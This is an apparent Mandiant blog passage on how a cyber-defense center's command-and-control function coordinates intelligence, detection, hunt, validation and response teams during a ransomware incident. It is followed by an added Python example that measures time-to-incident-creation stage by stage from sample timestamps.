The command-and-control function acts as the central hub of awareness, facilitating and tracking communications between groups handling intelligence, detection, response, hunt, and validation. Command-and-control defines and sustains the governance, collaboration, and communications for specialized expertise that is potentially insourced or outsourced given the organization’s composition. Specialized functions often focus almost entirely on their area of expertise, requiring command-and-control to provide interconnection and collaboration.
Let’s explore a ransomware-related sample use case in which an administrator account was abused by a threat actor who updated a group policy object (GPO) to create a scheduled task on all servers for execution, beginning on Friday and concluding on Sunday. The adversary selected this specific tactic to easily distribute malware across the entire victim environment. On the first day of deployment, the security operations center (SOC) received and escalated endpoint alerts that identified the scheduled task pointing to an unsigned PowerShell script. Based on this incident, the command-and-control function would assume responsibility to ensure all cyber-defense center functional resources are orchestrated properly and collaborating effectively by enforcing a RACI model to align functional capabilities and responsibilities:
• Share details with the intelligence function, requesting analysis to determine the potential type of threat and motivation behind it.
• Disclose threat context with the detect function to deploy new alerts to scope the attacker’s presence and alarm attempted reentry.
• Assign incident prioritization to the hunt function to gather scheduled task configurations and begin analysis of similar server activities.
• Direct the validation function to test the scheduled task in a sandbox.
• Uncover all findings with the response function to request initiation of rapid remediation.
After an incident is resolved, command-and-control publishes metrics that showcase the effectiveness of the cyber-defense center’s operational workflow. Since many aspects of the process are cyclical, they are measured at smaller units of the cycles. For example, the time-to-incident-creation holds many steps, including the time from log event generation to SIEM alert, SOAR enrichment, and analyst triage and escalation. The measurement of each smaller unit demonstrates where time was lost. Inept transitions between specialized, functional silos waste significant time, which command-and-control’s management combats.
Outside of incidents, command-and-control monitors and measures cyber-defense operations. This enforcement of interoperation prevents the functional silos from forming. Without this core function, Mandiant has witnessed immature security teams exacerbate the delay, and at times cause the demise of their security readiness. For example, Mandiant has observed teams forbid the socialization of incident reports, hide penetration test results from the rest of the cyber-defense center, and obscurely publish findings that never become championed and in turn sit dormant without action.
The continuous command-and-control efforts of assessing, tracking, and measuring cyber incidents and guiding actionable improvements help mature the holistic expertise of the cyber-defense center’s productivity. Ultimately, command-and-control ensures the necessary governance, processes, and communications are adapted by all critical functions and structured accordingly to guide effective operations for combating sophisticated cyber adversaries.
About the Company: Since 2004, Mandiant provides unparalleled threat intelligence and incident response to help organizations tackle their top security challenges. Learn how we can assess and improve your cyber defense. Get a copy of the award-winning book The Defender’s Advantage. Mandiant is now part of Google Cloud.
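As an added example (not Mandiant’s code), the metric described above carried out: time-to-incident-creation is split into the smaller units the text names (log event to SIEM alert, SOAR enrichment, analyst triage, escalation), and the hand-off with the highest median duration is reported as the place where time was lost. The incident records, their IDs and timestamps are constructed, and the field names are assumptions about how a case export might look.

```python
"""Added example, not Mandiant's code: time-to-incident-creation broken into the
smaller units the text names (log event -> SIEM alert -> SOAR enrichment ->
analyst triage -> escalation). Incident IDs and timestamps are constructed."""
from datetime import datetime
from statistics import median

# Hand-off points in the order they occur for every incident.
STAGES = ["log_event", "siem_alert", "soar_enriched", "analyst_triage", "escalated"]

def stage_durations(incident):
    """Minutes spent between consecutive hand-offs, plus the end-to-end total.
    Rejects records whose hand-offs are out of order instead of reporting a
    negative duration."""
    times = [datetime.strptime(incident[s], "%Y-%m-%d %H:%M:%S") for s in STAGES]
    if any(later < earlier for earlier, later in zip(times, times[1:])):
        raise ValueError(f"{incident['id']}: hand-off timestamps are out of order")
    out = {}
    for a, b, ta, tb in zip(STAGES, STAGES[1:], times, times[1:]):
        out[f"{a}->{b}"] = (tb - ta).total_seconds() / 60
    out["total"] = (times[-1] - times[0]).total_seconds() / 60
    return out

def slowest_transition(incidents):
    """The hand-off with the highest median duration across incidents: the silo
    boundary command-and-control should look at first."""
    per_stage = {}
    for inc in incidents:
        for name, minutes in stage_durations(inc).items():
            if name != "total":
                per_stage.setdefault(name, []).append(minutes)
    name = max(per_stage, key=lambda k: median(per_stage[k]))
    return name, median(per_stage[name])

# Constructed sample: three incidents from one week, as a SOAR case export might look.
SAMPLE_INCIDENTS = [
    {"id": "INC-1", "log_event": "2022-11-04 08:00:00", "siem_alert": "2022-11-04 08:03:00",
     "soar_enriched": "2022-11-04 08:05:00", "analyst_triage": "2022-11-04 09:50:00",
     "escalated": "2022-11-04 10:00:00"},
    {"id": "INC-2", "log_event": "2022-11-05 13:00:00", "siem_alert": "2022-11-05 13:02:00",
     "soar_enriched": "2022-11-05 13:04:00", "analyst_triage": "2022-11-05 14:00:00",
     "escalated": "2022-11-05 14:05:00"},
    {"id": "INC-3", "log_event": "2022-11-06 22:10:00", "siem_alert": "2022-11-06 22:40:00",
     "soar_enriched": "2022-11-06 22:41:00", "analyst_triage": "2022-11-06 23:20:00",
     "escalated": "2022-11-06 23:30:00"},
]

if __name__ == "__main__":
    for inc in SAMPLE_INCIDENTS:
        print(inc["id"], stage_durations(inc))
    print("slowest hand-off:", slowest_transition(SAMPLE_INCIDENTS))
```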